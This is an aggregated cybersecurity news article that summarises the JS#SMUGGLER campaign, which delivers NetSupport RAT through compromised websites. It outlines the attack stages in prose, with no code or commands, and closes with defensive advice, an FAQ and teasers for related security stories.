Loading
Yanuki
ARTICLE DETAIL
JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Websites | Project Glasswing: Securing Critical Software for the AI Era | Project Glasswing: AI Secures Critical Software | Bitcoin Depot Suffers $3.6 Million Crypto Heist | FBI Extracts Deleted Signal Messages: How to Protect Your Privacy | Chinese Supercomputer Hack: Data Breach Exposes Sensitive Information | Eurail Data Breach Impacts Over 300,000 U.S. Individuals | Hims & Hers Discloses Data Breach After Social Engineering Attack | Massive Data Breach at Chinese Supercomputing Hub Exposes Sensitive Military and Research Data | JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Websites | Project Glasswing: Securing Critical Software for the AI Era | Project Glasswing: AI Secures Critical Software | Bitcoin Depot Suffers $3.6 Million Crypto Heist | FBI Extracts Deleted Signal Messages: How to Protect Your Privacy | Chinese Supercomputer Hack: Data Breach Exposes Sensitive Information | Eurail Data Breach Impacts Over 300,000 U.S. Individuals | Hims & Hers Discloses Data Breach After Social Engineering Attack | Massive Data Breach at Chinese Supercomputing Hub Exposes Sensitive Military and Research Data

Cybersecurity / Cyber Attacks

JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Websites

Cybersecurity researchers have uncovered a sophisticated campaign named JS#SMUGGLER that leverages compromised websites to distribute the NetSupport RAT (Remote Access Trojan). This multi-stage attack grants cybercriminals extensive control...

Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT
Share
X LinkedIn

cybersecurity news today
JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Websites Image via The Hacker News

Key Insights

  • JS#SMUGGLER uses compromised websites to spread NetSupport RAT.
  • The attack involves a three-stage process: obfuscated JavaScript loader, hidden HTA execution, and PowerShell payload delivery.
  • NetSupport RAT allows attackers to remotely control desktops, steal data, and execute commands.
  • The campaign employs multiple layers of obfuscation and evasion techniques to avoid detection.
  • Why this matters: This campaign demonstrates the increasing sophistication of web-based malware attacks and the need for enhanced security measures to protect against remote access threats.

In-Depth Analysis

The JS#SMUGGLER campaign is a complex, multi-stage web-based malware operation. Here's a breakdown:

1. **Compromised Websites:** Attackers inject a heavily obfuscated JavaScript loader ("phone.js") into compromised websites. This loader is retrieved from attacker-controlled domains. 2. **Device Profiling:** The JavaScript loader profiles the device visiting the website. Mobile users are redirected to a full-screen iframe, while desktop users trigger a remote script injection. 3. **Hidden HTA Execution:** A malicious HTML Application (HTA) is executed silently using "mshta.exe," a legitimate Windows component. This HTA deploys a fileless PowerShell stager. 4. **PowerShell Payload:** The PowerShell stager decrypts and executes a payload in memory, avoiding detection. This payload retrieves and deploys NetSupport RAT. 5. **NetSupport RAT Deployment:** NetSupport RAT is installed, granting attackers complete remote control over the compromised host. The malware achieves persistence by creating a disguised shortcut in the Windows Startup folder.

This campaign uses multiple evasion techniques, including obfuscation, encryption, and fileless execution, to bypass traditional security measures. The attackers also employ a tracking mechanism to ensure the malicious logic is fired only once per visit, minimizing the chances of detection.

Read source article

FAQ

What is JS#SMUGGLER?

JS#SMUGGLER is a sophisticated, multi-stage web-based malware campaign that uses compromised websites to distribute the NetSupport RAT.

What is NetSupport RAT?

NetSupport RAT (Remote Access Trojan) is a legitimate remote administration tool that is being used maliciously to gain unauthorized access and control over victim systems.

How can I protect myself from this type of attack?

Validate all software downloads carefully, strengthen your endpoint defenses to detect suspicious script activity, enforce strict script execution policies, enable PowerShell logging, and monitor Startup folder changes.

Takeaways

  • The JS#SMUGGLER campaign highlights the importance of being cautious when visiting websites, as even legitimate sites can be compromised.
  • Organizations and individuals should implement robust security measures, including endpoint detection and response (EDR) solutions, to detect and prevent such attacks.
  • Regular security audits and employee training can help reduce the risk of falling victim to web-based malware campaigns.

Discussion

Do you think these types of attacks will become more common? What security measures do you have in place to protect against them? Share this article with others who need to stay ahead of this trend!

Sources

Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT Sophisticated Multi-Stage JS#SMUGGLER Attack Installs 'NetSupport RAT' to Seize Complete System Control New JS#SMUGGLER Campaign Drops NetSupport RAT Through Infected Sites

Disclaimer

This article was compiled by Yanuki using publicly available data and trending information. The content may summarize or reference third-party sources that have not been independently verified. While we aim to provide timely and accurate insights, the information presented may be incomplete or outdated.

All content is provided for general informational purposes only and does not constitute financial, legal, or professional advice. Yanuki makes no representations or warranties regarding the reliability or completeness of the information.

This article may include links to external sources for further context. These links are provided for convenience only and do not imply endorsement.

Always do your own research (DYOR) before making any decisions based on the information presented.

Related Stories

Cybersecurity / AI Security

Project Glasswing: Securing Critical Software for the AI Era

Project Glasswing, spearheaded by Anthropic, is a collaborative initiative bringing together major tech companies to enhance cybersecurity using AI. This project aims to address the increasing threat of AI-driven cyberattacks by proactively...

Opinion | It’s the End of the Internet as We Know It

Cybersecurity / AI

Project Glasswing: AI Secures Critical Software

Project Glasswing, spearheaded by Anthropic, is a collaborative initiative uniting tech giants like Amazon, Apple, Microsoft, and Google to leverage AI in bolstering cybersecurity. The project addresses the increasing threat of AI-driven cy...

Project Glasswing: Securing critical software for the AI era

Cybersecurity / Financial Threats

Bitcoin Depot Suffers $3.6 Million Crypto Heist

Bitcoin Depot, a prominent crypto ATM operator, has suffered a significant security breach resulting in the loss of $3.6 million in Bitcoin. This incident underscores the increasing risks faced by cryptocurrency platforms and the importance...

$3.6 Million Crypto Heist Targets Bitcoin Depot

Cybersecurity / Data Privacy

FBI Extracts Deleted Signal Messages: How to Protect Your Privacy

The FBI has discovered a method to extract deleted Signal messages from iPhones, raising privacy concerns for users of the encrypted messaging app. This article explains how they did it and, more importantly, how you can prevent it.

FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database

Cybersecurity / Data Breach

Chinese Supercomputer Hack: Data Breach Exposes Sensitive Information

A significant data breach has allegedly compromised a state-run Chinese supercomputer, potentially exposing over 10 petabytes of sensitive information, including classified defense documents and missile schematics. This incident raises conc...

A hacker has allegedly breached one of China’s supercomputers and is attempting to sell a trove of stolen data

Cybersecurity / Data Breach

Eurail Data Breach Impacts Over 300,000 U.S. Individuals

A significant data breach at Eurail B.V. has exposed the personal information of over 300,000 individuals in the United States. The breach, which occurred between late December 2025 and early January 2026, involved unauthorized access to Eu...

300,000 People Impacted by Eurail Data Breach

Cybersecurity / Breaches

Hims & Hers Discloses Data Breach After Social Engineering Attack

Hims & Hers, a telehealth company offering weight-loss and sexual health products, recently disclosed a data breach affecting its third-party customer service platform. The breach, stemming from a sophisticated social engineering attack, po...

Hims & Hers says limited data stolen in social engineering attack